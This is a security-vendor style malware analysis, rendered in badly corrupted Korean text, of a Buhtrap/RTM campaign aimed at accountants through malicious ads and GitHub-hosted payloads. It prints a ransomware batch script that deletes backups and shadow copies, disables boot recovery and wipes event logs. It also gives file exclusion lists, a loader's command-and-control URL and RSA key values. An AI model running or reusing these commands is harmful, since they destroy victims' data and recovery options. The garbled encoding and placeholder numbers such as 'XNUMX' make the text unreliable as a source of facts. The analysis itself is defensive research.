์ฌ์ด๋ฒ ๊ณต๊ฒฉ์์ ํ๊ณ์ฌ๋ฅผ ํ์ ์ผ๋ก ์ผ์ผ๋ ค๋ฉด ํ๊ณ์ฌ๊ฐ ์จ๋ผ์ธ์์ ๊ฒ์ํ๋ ์
๋ฌด ๋ฌธ์๋ฅผ ์ฌ์ฉํ ์ ์์ต๋๋ค. ์ด๊ฒ์ ๋๋ต ์ฌ์ด๋ฒ ๊ทธ๋ฃน์ด ์ง๋ ๋ช ๋ฌ ๋์ ์๋ ค์ง ๋ฐฑ๋์ด๋ฅผ ๋ฐฐํฌํ๋ฉด์ ์ํํด ์จ ์์
์
๋๋ค.
Buhtrap์ ์์ค์ฝ๋๋ ๊ณผ๊ฑฐ ๋๊ตฌ๋ ์ฌ์ฉํ ์ ์๋๋ก ์จ๋ผ์ธ์ ์ ์ถ๋ ๋ฐ ์์ต๋๋ค. RTM ์ฝ๋ ๊ฐ์ฉ์ฑ์ ๊ดํ ์ ๋ณด๊ฐ ์์ต๋๋ค.
์ด ๊ฒ์๋ฌผ์์๋ ๊ณต๊ฒฉ์๊ฐ Yandex.Direct๋ฅผ ์ฌ์ฉํ์ฌ ์ ์ฑ ์ฝ๋๋ฅผ ๋ฐฐํฌํ๊ณ GitHub์ ํธ์คํ ํ๋ ๋ฐฉ๋ฒ์ ๋ํด ์ค๋ช ํฉ๋๋ค. ์ด๋ฒ ํฌ์คํ ์ ์ ์ฑ์ฝ๋์ ๋ํ ๊ธฐ์ ์ ๋ถ์์ผ๋ก ๋ง๋ฌด๋ฆฌํ๊ฒ ์ต๋๋ค.
Buhtrap๊ณผ RTM์ด ๋ค์ ์ฌ์ ์ ์์ํ์ต๋๋ค.
ํ์ฐ ๋ฉ์ปค๋์ฆ๊ณผ ํผํด์
ํผํด์์๊ฒ ์ ๋ฌ๋ ๋ค์ํ ํ์ด๋ก๋๋ ๊ณตํต ์ ํ ๋ฉ์ปค๋์ฆ์ ๊ณต์ ํฉ๋๋ค. ๊ณต๊ฒฉ์๊ฐ ์์ฑํ ๋ชจ๋ ์ ์ฑ ํ์ผ์ ๋ ๊ฐ์ ์๋ก ๋ค๋ฅธ GitHub ์ ์ฅ์์ ๋ฐฐ์น๋์์ต๋๋ค.
์ผ๋ฐ์ ์ผ๋ก ์ ์ฅ์์๋ ๋ค์ด๋ก๋ ๊ฐ๋ฅํ ์ ์ฑ ํ์ผ์ด ํ๋ ํฌํจ๋์ด ์์ผ๋ฉฐ ์์ฃผ ๋ณ๊ฒฝ๋์์ต๋๋ค. GitHub๋ฅผ ์ฌ์ฉํ๋ฉด ๋ฆฌํฌ์งํ ๋ฆฌ ๋ณ๊ฒฝ ๋ด์ญ์ ๋ณผ ์ ์์ผ๋ฏ๋ก ํน์ ๊ธฐ๊ฐ ๋์ ์ด๋ค ์ ์ฑ ์ฝ๋๊ฐ ๋ฐฐํฌ๋์๋์ง ํ์ธํ ์ ์์ต๋๋ค. ํผํด์๊ฐ ์ ์ฑ ํ์ผ์ ๋ค์ด๋ก๋ํ๋๋ก ์ ๋ํ๊ธฐ ์ํด ์ ๊ทธ๋ฆผ์ ํ์๋ Blanki-shabloni24[.]ru ์น์ฌ์ดํธ๋ฅผ ์ฌ์ฉํ์ต๋๋ค.
์ฌ์ดํธ์ ๋์์ธ๊ณผ ์ ์ฑ ํ์ผ์ ๋ชจ๋ ์ด๋ฆ์ ์์, ํ ํ๋ฆฟ, ๊ณ์ฝ์, ์ํ ๋ฑ ๋จ์ผ ๊ฐ๋ ์ ๋ฐ๋ฆ ๋๋ค. ๊ณผ๊ฑฐ Buhtrap ๋ฐ RTM ์ํํธ์จ์ด๊ฐ ์ด๋ฏธ ํ๊ณ์ฌ ๊ณต๊ฒฉ์ ์ฌ์ฉ๋ ์ ์ ๊ณ ๋ คํ๋ฉด ์ ์บ ํ์ธ์ ์ ๋ต์ ๋์ผํฉ๋๋ค. ์ ์ผํ ์ง๋ฌธ์ ํผํด์๊ฐ ๊ณต๊ฒฉ์์ ์น์ฌ์ดํธ์ ์ด๋ป๊ฒ ์ ์ํ๋์ง์ ๋๋ค.
๊ฐ์ผ
์ด ์ฌ์ดํธ์ ์ ์ํ ์ ์ฌ์ ํผํด์ ์ค ์ ์ด๋ ๋ช ๋ช ์ ์ ์ฑ ๊ด๊ณ ์ ๋งค๋ฃ๋์์ต๋๋ค. ๋ค์์ ์์ URL์ ๋๋ค.
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ัะบะฐัะฐัั ะฑะปะฐะฝะบ ััะตัะฐ&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
๋งํฌ๋ฅผ ๋ณด์๋ฉด ์์๊ฒ ์ง๋ง, ํด๋น ๋ฐฐ๋๋ ํฉ๋ฒ์ ์ธ ํ๊ณ ํฌ๋ผ์ธ bb.f2[.]kz์ ๊ฒ์๋์์ต๋๋ค. ๋ฐฐ๋๋ ์๋ก ๋ค๋ฅธ ์ฌ์ดํธ์ ๋ํ๋ฌ๊ณ , ๋ชจ๋ ๋์ผํ ์บ ํ์ธ ID(blanki_rsya)๋ฅผ ๊ฐ๊ณ ์์ผ๋ฉฐ, ๋๋ถ๋ถ ํ๊ณ ๋๋ ๋ฒ๋ฅ ์ง์ ์๋น์ค์ ๊ด๋ จ๋์ด ์๋ค๋ ์ ์ ๊ธฐ์ตํ๋ ๊ฒ์ด ์ค์ํฉ๋๋ค. URL์ ์ ์ฌ์ ํผํด์๊ฐ "์ก์ฅ ์์ ๋ค์ด๋ก๋" ์์ฒญ์ ์ฌ์ฉํ์์ ๋ณด์ฌ ์ฃผ๋ฉฐ, ์ด๋ ํ์ ๊ณต๊ฒฉ์ ๋ํ ์ฐ๋ฆฌ์ ๊ฐ์ค์ ๋ท๋ฐ์นจํฉ๋๋ค. ์๋๋ ๋ฐฐ๋๊ฐ ๋ฑ์ฅํ ์ฌ์ดํธ์ ํด๋น ๊ฒ์์ด์ ๋๋ค.
- ์ฒญ๊ตฌ์ ์์ ๋ค์ด๋ก๋ โ bb.f2[.]kz
- ์ํ ๊ณ์ฝ - Ipopen[.]ru
- ์ ํ๋ฆฌ์ผ์ด์ ๋ถ๋ง ์ฌํญ ์ํ - 77metrov[.]ru
- ๊ณ์ฝ์ - ๊ณต๋ฐฑ-dogovor-kupli-prodazhi[.]ru
- ์ํ ๋ฒ์ ์ฒญ์ - zen.yandex[.]ru
- ์ํ ๋ถ๋ง ์ฌํญ - yuday[.]ru
- ์ํ ๊ณ์ฝ์ โ Regforum[.]ru
- ๊ณ์ฝ์ โ assistus[.]ru
- ์ํ ์ํํธ ๊ณ์ฝ โ โโnapravah[.]com
- ๋ฒ์ ๊ณ์ฝ ์ํ - avito[.]ru
Blanki-shabloni24[.]ru ์ฌ์ดํธ๋ ๊ฐ๋จํ ์๊ฐ์ ํ๊ฐ๋ฅผ ํต๊ณผํ๋๋ก ๊ตฌ์ฑ๋์์ ์ ์์ต๋๋ค. ์ผ๋ฐ์ ์ผ๋ก GitHub ๋งํฌ๊ฐ ํฌํจ๋ ์ ๋ฌธ์ ์ธ ์ฌ์ดํธ๋ฅผ ๊ฐ๋ฆฌํค๋ ๊ด๊ณ ๋ ๋ถ๋ช ํ ๋์ ๊ฒ์ผ๋ก ๋ณด์ด์ง ์์ต๋๋ค. ๋ํ ๊ณต๊ฒฉ์๋ ์บ ํ์ธ ๊ธฐ๊ฐ์ธ ๊ฒ์ผ๋ก ์ถ์ ๋๋ ์ ํ๋ ๊ธฐ๊ฐ ๋์๋ง ์ ์ฑ ํ์ผ์ ์ ์ฅ์์ ์ ๋ก๋ํ์ต๋๋ค. ๋๋ถ๋ถ์ ๊ฒฝ์ฐ GitHub ์ ์ฅ์์๋ ๋น zip ์์นด์ด๋ธ ๋๋ ๋น EXE ํ์ผ์ด ํฌํจ๋์ด ์์ต๋๋ค. ๋ฐ๋ผ์ ๊ณต๊ฒฉ์๋ ํน์ ๊ฒ์์ด์ ์๋ตํ์ฌ ํ๊ณ์ฌ๊ฐ ๋ฐฉ๋ฌธํ ๊ฐ๋ฅ์ฑ์ด ๊ฐ์ฅ ๋์ ์ฌ์ดํธ์ Yandex.Direct๋ฅผ ํตํด ๊ด๊ณ ๋ฅผ ๋ฐฐํฌํ ์ ์์ต๋๋ค.
๋ค์์ผ๋ก ์ด๋ฐ ์์ผ๋ก ๋ฐฐํฌ๋๋ ๋ค์ํ ํ์ด๋ก๋๋ฅผ ์ดํด๋ณด๊ฒ ์ต๋๋ค.
ํ์ด๋ก๋ ๋ถ์
๋ถํฌ์ ์ฐ๋๊ธฐ
ํด๋น ์ ์ฑ ์บ ํ์ธ์ 2018๋ XNUMX์ ๋ง๋ถํฐ ์์๋์ด ๊ธ์ ์ฐ๋ ์์ ์๋ ํ๋ฐํ๊ฒ ํ๋ํ๊ณ ์์ต๋๋ค. ์ ์ฒด ์ ์ฅ์๊ฐ GitHub์์ ๊ณต๊ฐ์ ์ผ๋ก ์ฌ์ฉ ๊ฐ๋ฅํ๊ธฐ ๋๋ฌธ์ ์ฐ๋ฆฌ๋ XNUMX๊ฐ์ง ์๋ก ๋ค๋ฅธ ์ ์ฑ ์ฝ๋ ๊ณ์ด์ ๋ฐฐํฌ์ ๋ํ ์ ํํ ํ์๋ผ์ธ์ ํธ์งํ์ต๋๋ค(์๋ ๊ทธ๋ฆผ ์ฐธ์กฐ). Git ๊ธฐ๋ก๊ณผ ๋น๊ตํ๊ธฐ ์ํด ESET ์๊ฒฉ ์ธก์ ์ผ๋ก ์ธก์ ํ์ฌ ๋ฐฐ๋ ๋งํฌ๊ฐ ๋ฐ๊ฒฌ๋ ์๊ธฐ๋ฅผ ํ์ํ๋ ์ค์ ์ถ๊ฐํ์ต๋๋ค. ๋ณด์๋ค์ํผ ์ด๋ GitHub์ ํ์ด๋ก๋ ๊ฐ์ฉ์ฑ๊ณผ ๋ฐ์ ํ ๊ด๋ จ์ด ์์ต๋๋ค. XNUMX์ ๋ง ๋ถ์ผ์น๋ ์ ์ฅ์๊ฐ ์ ์ฒด๋ฅผ ์ป๊ธฐ ์ ์ GitHub์์ ์ ๊ฑฐ๋์๊ธฐ ๋๋ฌธ์ ๋ณ๊ฒฝ ๊ธฐ๋ก์ ์ผ๋ถ๊ฐ ์๋ค๋ ์ฌ์ค๋ก ์ค๋ช ๋ ์ ์์ต๋๋ค.
๊ทธ๋ฆผ 1. ์
์ฑ์ฝ๋ ์ ํฌ ์ฐ๋์
์ฝ๋ ์๋ช ์ธ์ฆ์
์บ ํ์ธ์์๋ ์ฌ๋ฌ ์ธ์ฆ์๋ฅผ ์ฌ์ฉํ์ต๋๋ค. ์ผ๋ถ๋ ๋ ์ด์์ ์ ์ฑ ์ฝ๋๊ตฐ์ ์ํด ์๋ช ๋์์ผ๋ฉฐ ์ด๋ ์๋ก ๋ค๋ฅธ ์ํ์ด ๋์ผํ ์บ ํ์ธ์ ์ํ์์ ๋ํ๋ ๋๋ค. ๊ฐ์ธ ํค๊ฐ ์์์๋ ๋ถ๊ตฌํ๊ณ ์ด์์๋ ๋ฐ์ด๋๋ฆฌ์ ์ฒด๊ณ์ ์ผ๋ก ์๋ช ํ์ง ์์์ผ๋ฉฐ ๋ชจ๋ ์ํ์ ํค๋ฅผ ์ฌ์ฉํ์ง ์์์ต๋๋ค. 2019๋ XNUMX์ ๋ง, ๊ณต๊ฒฉ์๋ค์ ๊ฐ์ธ ํค๊ฐ ์๋ Google ์์ ์ธ์ฆ์๋ฅผ ์ฌ์ฉํ์ฌ ์๋ชป๋ ์๋ช ์ ๋ง๋ค๊ธฐ ์์ํ์ต๋๋ค.
์บ ํ์ธ๊ณผ ๊ด๋ จ๋ ๋ชจ๋ ์ธ์ฆ์์ ๊ทธ๋ค์ด ์๋ช ํ ๋งฌ์จ์ด ๊ณ์ด์ด ์๋ ํ์ ๋์ด๋์ด ์์ต๋๋ค.
๋ํ ์ฐ๋ฆฌ๋ ์ด๋ฌํ ์ฝ๋ ์๋ช
์ธ์ฆ์๋ฅผ ์ฌ์ฉํ์ฌ ๋ค๋ฅธ ๋งฌ์จ์ด ๊ณ์ด๊ณผ์ ์ฐ๊ฒฐ์ ์ค์ ํ์ต๋๋ค. ๋๋ถ๋ถ์ ์ธ์ฆ์์ ๋ํด GitHub ๋ฆฌํฌ์งํ ๋ฆฌ๋ฅผ ํตํด ๋ฐฐํฌ๋์ง ์์ ์ํ์ ์ฐพ์ง ๋ชปํ์ต๋๋ค. ๊ทธ๋ฌ๋ TOV โMARIYAโ ์ธ์ฆ์๋ ๋ด๋ท์ ์ํ๋ ์
์ฑ์ฝ๋์ ์๋ช
ํ๋ ๋ฐ ์ฌ์ฉ๋์์ต๋๋ค.
Win32/ํ์ผ์ฝ๋.Buhtrap
์ฐ๋ฆฌ์ ๊ด์ฌ์ ๋์๋ ์ฒซ ๋ฒ์งธ ๊ตฌ์ฑ ์์๋ ์๋ก ๋ฐ๊ฒฌ๋ Win32/Filecoder.Buhtrap์ด์์ต๋๋ค. ์ด๋ ๋๋๋ก ํจํค์ง๋ก ์ ๊ณต๋๋ Delphi ๋ฐ์ด๋๋ฆฌ ํ์ผ์ ๋๋ค. ์ฃผ๋ก 2019๋ XNUMX~XNUMX์์ ๋ฐฐํฌ๋์์ต๋๋ค. ์ด๋ ๋์ฌ์จ์ด ํ๋ก๊ทธ๋จ์ ๋ง๊ฒ ์๋ํฉ๋๋ค. ์ฆ, ๋ก์ปฌ ๋๋ผ์ด๋ธ์ ๋คํธ์ํฌ ํด๋๋ฅผ ๊ฒ์ํ๊ณ ํ์ง๋ ํ์ผ์ ์ํธํํฉ๋๋ค. ์ํธํ ํค๋ฅผ ๋ณด๋ด๊ธฐ ์ํด ์๋ฒ์ ์ ์ํ์ง ์๊ธฐ ๋๋ฌธ์ ์ธํฐ๋ท ์ฐ๊ฒฐ์ด ์์๋ ํ์๊ฐ ์์ต๋๋ค. ๋์ ๋์ฌ ๋ฉ์์ง ๋์ "ํ ํฐ"์ ์ถ๊ฐํ๊ณ ์ด๋ฉ์ผ์ด๋ Bitmessage๋ฅผ ์ฌ์ฉํ์ฌ ์ด์์์๊ฒ ์ฐ๋ฝํ ๊ฒ์ ์ ์ํฉ๋๋ค.
๊ฐ๋ฅํ ํ ๋ง์ ๋ฏผ๊ฐํ ๋ฆฌ์์ค๋ฅผ ์ํธํํ๊ธฐ ์ํด Filecoder.Buhtrap์ ์ํธํ๋ฅผ ๋ฐฉํดํ ์ ์๋ ๊ท์คํ ์ ๋ณด๊ฐ ํฌํจ๋ ์ด๋ฆฐ ํ์ผ ํธ๋ค๋ฌ๊ฐ ์์ ์ ์๋ ์ฃผ์ ์ํํธ์จ์ด๋ฅผ ์ข ๋ฃํ๋๋ก ์ค๊ณ๋ ์ค๋ ๋๋ฅผ ์คํํฉ๋๋ค. ๋์ ํ๋ก์ธ์ค๋ ์ฃผ๋ก ๋ฐ์ดํฐ๋ฒ ์ด์ค ๊ด๋ฆฌ ์์คํ (DBMS)์ ๋๋ค. ๋ํ Filecoder.Buhtrap์ ๋ก๊ทธ ํ์ผ๊ณผ ๋ฐฑ์ ์ ์ญ์ ํ์ฌ ๋ฐ์ดํฐ ๋ณต๊ตฌ๋ฅผ ์ด๋ ต๊ฒ ๋ง๋ญ๋๋ค. ์ด๋ ๊ฒ ํ๋ ค๋ฉด ์๋ ๋ฐฐ์น ์คํฌ๋ฆฝํธ๋ฅผ ์คํํ์ธ์.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap์ ์น์ฌ์ดํธ ๋ฐฉ๋ฌธ์์ ๋ํ ์ ๋ณด๋ฅผ ์์งํ๋๋ก ์ค๊ณ๋ ํฉ๋ฒ์ ์ธ ์จ๋ผ์ธ IP Logger ์๋น์ค๋ฅผ ์ฌ์ฉํฉ๋๋ค. ์ด๋ ๋ช ๋ น์ค์ ์ฑ ์์ธ ๋์ฌ์จ์ด ํผํด์๋ฅผ ์ถ์ ํ๊ธฐ ์ํ ๊ฒ์ ๋๋ค.
mshta.exe "javascript:document.write('');"
์ธ ๊ฐ์ ์ ์ธ ๋ชฉ๋ก๊ณผ ์ผ์นํ์ง ์์ผ๋ฉด ์ํธํํ ํ์ผ์ด ์ ํ๋ฉ๋๋ค. ์ฒซ์งธ, ๋ค์ ํ์ฅ์๋ฅผ ๊ฐ์ง ํ์ผ์ ์ํธํ๋์ง ์์ต๋๋ค: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ๋ฐ .๋ฐ์ฅ. ๋์งธ, ์ ์ฒด ๊ฒฝ๋ก์ ์๋ ๋ชฉ๋ก์ ๋๋ ํฐ๋ฆฌ ๋ฌธ์์ด์ด ํฌํจ๋ ๋ชจ๋ ํ์ผ์ด ์ ์ธ๋ฉ๋๋ค.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
์ ์งธ, ๋์ฌ ๋ฉ์์ง์ ํ์ผ๋ช ๊ณผ ๊ฐ์ ํน์ ํ์ผ๋ช ๋ ์ํธํ์์ ์ ์ธ๋ฉ๋๋ค. ๋ชฉ๋ก์ ์๋์ ๋์ ์์ต๋๋ค. ๋ถ๋ช ํ ์ด๋ฌํ ์์ธ๋ ๋ชจ๋ ๊ธฐ๊ณ ์๋์ ์ ์งํ๊ธฐ ์ํ ๊ฒ์ด์ง๋ง ์ฃผํ ์ ํฉ์ฑ์ ์ต์ํํ๊ธฐ ์ํ ๊ฒ์ ๋๋ค.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
ํ์ผ ์ํธํ ์ฒด๊ณ
์ ์ฑ์ฝ๋๊ฐ ์คํ๋๋ฉด 512๋นํธ RSA ํค ์์ ์์ฑํฉ๋๋ค. ๊ทธ๋ฐ ๋ค์ ๊ฐ์ธ ์ง์(d)์ ๋ชจ๋๋ฌ์ค(n)๋ ํ๋ ์ฝ๋ฉ๋ 2048๋นํธ ๊ณต๊ฐ ํค(๊ณต๊ฐ ์ง์ ๋ฐ ๋ชจ๋๋ฌ์ค)๋ก ์ํธํ๋๊ณ , zlib๋ก ์์ถ๋๊ณ , base64๋ก ์ธ์ฝ๋ฉ๋ฉ๋๋ค. ์ด๋ฅผ ๋ด๋นํ๋ ์ฝ๋๋ ๊ทธ๋ฆผ 2์ ๋์ ์์ต๋๋ค.
๊ทธ๋ฆผ 2. 512๋นํธ RSA ํค ์ ์์ฑ ํ๋ก์ธ์ค์ Hex-Rays ๋์ปดํ์ผ ๊ฒฐ๊ณผ.
๋ค์์ ๋์ฌ ๋ฉ์์ง์ ์ฒจ๋ถ๋ ํ ํฐ์ธ ์์ฑ๋ ๊ฐ์ธ ํค๊ฐ ํฌํจ๋ ์ผ๋ฐ ํ ์คํธ์ ์์ ๋๋ค.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
๊ณต๊ฒฉ์์ ๊ณต๊ฐํค๋ ์๋์ ๊ฐ์ต๋๋ค.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ํ์ผ์ 128๋นํธ ํค์ AES-256-CBC๋ฅผ ์ฌ์ฉํ์ฌ ์ํธํ๋ฉ๋๋ค. ์ํธํ๋ ๊ฐ ํ์ผ์ ๋ํด ์ ํค์ ์ ์ด๊ธฐํ ๋ฒกํฐ๊ฐ ์์ฑ๋ฉ๋๋ค. ์ํธํ๋ ํ์ผ ๋์ ํค ์ ๋ณด๊ฐ ์ถ๊ฐ๋ฉ๋๋ค. ์ํธํ๋ ํ์ผ์ ํ์์ ๊ณ ๋ คํด ๋ณด๊ฒ ์ต๋๋ค.
์ํธํ๋ ํ์ผ์๋ ๋ค์ ํค๋๊ฐ ์์ต๋๋ค.
VEGA ๋งค์ง ๊ฐ์ด ์ถ๊ฐ๋ ์์ค ํ์ผ ๋ฐ์ดํฐ๋ ์ฒ์ 0x5000๋ฐ์ดํธ๊น์ง ์ํธํ๋ฉ๋๋ค. ๋ชจ๋ ์ํธ ํด๋
์ ๋ณด๋ ๋ค์ ๊ตฌ์กฐ์ ํ์ผ์ ์ฒจ๋ถ๋ฉ๋๋ค.
- ํ์ผ ํฌ๊ธฐ ํ์์๋ ํ์ผ ํฌ๊ธฐ๊ฐ 0x5000๋ฐ์ดํธ๋ณด๋ค ํฐ์ง ์ฌ๋ถ๋ฅผ ๋ํ๋ด๋ ํ์๊ฐ ํฌํจ๋์ด ์์ต๋๋ค.
โ AES ํค blob = ZlibCompress(RSAEncrypt(AES ํค + IV, ์์ฑ๋ RSA ํค ์์ ๊ณต๊ฐ ํค))
- RSA ํค blob = ZlibCompress(RSAEncrypt(์์ฑ๋ RSA ๊ฐ์ธ ํค, ํ๋ ์ฝ๋ฉ๋ RSA ๊ณต๊ฐ ํค))
Win32/ํด๋ฆฝ๋ฑ ์ปค
Win32/ClipBanker๋ 2018๋ 4์ ๋ง๋ถํฐ XNUMX์ ์ด๊น์ง ๊ฐํ์ ์ผ๋ก ๋ฐฐํฌ๋์๋ ๊ตฌ์ฑ ์์์ ๋๋ค. ๊ทธ ์ญํ ์ ํด๋ฆฝ๋ณด๋์ ๋ด์ฉ์ ๋ชจ๋ํฐ๋งํ๊ณ ์ํธํํ ์ง๊ฐ์ ์ฃผ์๋ฅผ ์ฐพ๋ ๊ฒ์ ๋๋ค. ๋์ ์ง๊ฐ ์ฃผ์๋ฅผ ๊ฒฐ์ ํ ํ ClipBanker๋ ์ด๋ฅผ ์ด์์์๊ฒ ์ํ๋ค๊ณ ์๊ฐ๋๋ ์ฃผ์๋ก ๋์ฒดํฉ๋๋ค. ์ฐ๋ฆฌ๊ฐ ์กฐ์ฌํ ์ํ์ ๋ฐ์คํ์ด๊ฑฐ๋ ๋๋ ํ๋์ง ์์์ต๋๋ค. ๋์์ ๋ง์คํนํ๋ ๋ฐ ์ฌ์ฉ๋๋ ์ ์ผํ ๋ฉ์ปค๋์ฆ์ ๋ฌธ์์ด ์ํธํ์ ๋๋ค. ์ด์์ ์ง๊ฐ ์ฃผ์๋ RCXNUMX๋ฅผ ์ฌ์ฉํ์ฌ ์ํธํ๋ฉ๋๋ค. ๋์ ์ํธํํ๋ ๋นํธ์ฝ์ธ, ๋นํธ์ฝ์ธ โโ์บ์, ๋์ง์ฝ์ธ, ์ด๋๋ฆฌ์, ๋ฆฌํ์ ๋๋ค.
์ ์ฑ์ฝ๋๊ฐ ๊ณต๊ฒฉ์์ ๋นํธ์ฝ์ธ โโ์ง๊ฐ์ผ๋ก ํ์ฐ๋๋ ๋์ ์๋์ด VTS๋ก ์ ์ก๋์ด ์บ ํ์ธ์ ์ฑ๊ณต ์ฌ๋ถ์ ๋ํ ์๊ตฌ์ฌ์ ๋ถ๋ฌ์ผ์ผ์ผฐ์ต๋๋ค. ๋ํ ์ด๋ฌํ ๊ฑฐ๋๊ฐ ClipBanker์ ๊ด๋ จ์ด ์๋ค๋ ์ฆ๊ฑฐ๋ ์ ํ ์์ต๋๋ค.
Win32/RTM
Win32/RTM ๊ตฌ์ฑ ์์๋ 2019๋
2017์ ์ด์ ๋ฉฐ์น ๋์ ๋ฐฐํฌ๋์์ต๋๋ค. RTM์ ์๊ฒฉ ๋ฑ
ํน ์์คํ
์ ๋ชฉํ๋ก Delphi๋ก ์์ฑ๋ ํธ๋ก์ด ๋ชฉ๋ง ๋ฑ
์ปค์
๋๋ค. XNUMX๋
์ ESET ์ฐ๊ตฌ์ง์ ๋ค์๊ณผ ๊ฐ์ด ๋ฐํํ์ต๋๋ค.
Buhtrap ๋ก๋
ํ๋์ GitHub์์๋ ์ด์ Buhtrap ๋๊ตฌ์ ์ ์ฌํ์ง ์์ ๋ค์ด๋ก๋๋ฅผ ์ฌ์ฉํ ์ ์์์ต๋๋ค. ๊ทธ๋ ๋ค์์ผ๋ก ํฅํ๋ค https://94.100.18[.]67/RSS.php?<some_id>
๋ค์ ๋จ๊ณ๋ฅผ ๊ฐ์ ธ์ ๋ฉ๋ชจ๋ฆฌ์ ์ง์ ๋ก๋ํฉ๋๋ค. ๋ ๋ฒ์งธ ๋จ๊ณ ์ฝ๋์ ๋ ๊ฐ์ง ๋์์ ๊ตฌ๋ถํ ์ ์์ต๋๋ค. ์ฒซ ๋ฒ์งธ URL์์ RSS.php๋ Buhtrap ๋ฐฑ๋์ด๋ฅผ ์ง์ ์ ๋ฌํ์ต๋๋ค. ์ด ๋ฐฑ๋์ด๋ ์์ค ์ฝ๋๊ฐ ์ ์ถ๋ ํ ์ฌ์ฉํ ์ ์๋ ๋ฐฑ๋์ด์ ๋งค์ฐ ์ ์ฌํฉ๋๋ค.
ํฅ๋ฏธ๋กญ๊ฒ๋ ์ฐ๋ฆฌ๋ Buhtrap ๋ฐฑ๋์ด๋ฅผ ์ฌ์ฉํ๋ ์ฌ๋ฌ ์บ ํ์ธ์ ๋ณผ ์ ์์ผ๋ฉฐ, ์ด ์บ ํ์ธ์ ์๋ก ๋ค๋ฅธ ์ด์์์ ์ํด ์ด์๋๋ ๊ฒ์ผ๋ก ์๋ ค์ก์ต๋๋ค. ์ด ๊ฒฝ์ฐ ๊ฐ์ฅ ํฐ ์ฐจ์ด์ ์ ๋ฐฑ๋์ด๊ฐ ๋ฉ๋ชจ๋ฆฌ์ ์ง์ ๋ก๋๋๊ณ ์ฐ๋ฆฌ๊ฐ ์ธ๊ธํ DLL ๋ฐฐํฌ ํ๋ก์ธ์ค์ ํจ๊ป ์ผ๋ฐ์ ์ธ ๋ฐฉ์์ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ฒ์
๋๋ค.
๋ ๋ฒ์งธ๋ก ๋ ๋ณต์กํ ๋์์ RSS.php URL์ด ๋ค๋ฅธ ๋ก๋๋ก ์ ๋ฌ๋๋ค๋ ๊ฒ์
๋๋ค. ๋์ ๊ฐ์ ธ์ค๊ธฐ ํ
์ด๋ธ์ ๋ค์ ์์ฑํ๋ ๋ฑ ์ผ๋ถ ๋๋
ํ๋ฅผ ๊ตฌํํ์ต๋๋ค. ๋ถํธ๋ก๋์ ๋ชฉ์ ์ C&C ์๋ฒ์ ์ ์ํ๋ ๊ฒ์
๋๋ค.
์๋๋ก์ด๋/์คํ์ด.๋ฑ ์ปค
ํฅ๋ฏธ๋กญ๊ฒ๋ Android์ฉ ๊ตฌ์ฑ ์์๊ฐ GitHub ์ ์ฅ์์์๋ ๋ฐ๊ฒฌ๋์์ต๋๋ค. ๊ทธ๋ 1๋ 2018์ XNUMX์ผ ๋จ ํ๋ฃจ ๋์๋ง ๋ณธ์ ์ ์์์ต๋๋ค. GitHub์ ๊ฒ์๋ ๊ฒ ์ธ์ ESET ์๊ฒฉ ๋ถ์์์๋ ์ด ์ ์ฑ ์ฝ๋๊ฐ ๋ฐฐํฌ๋์๋ค๋ ์ฆ๊ฑฐ๋ฅผ ์ฐพ์ง ๋ชปํ์ต๋๋ค.
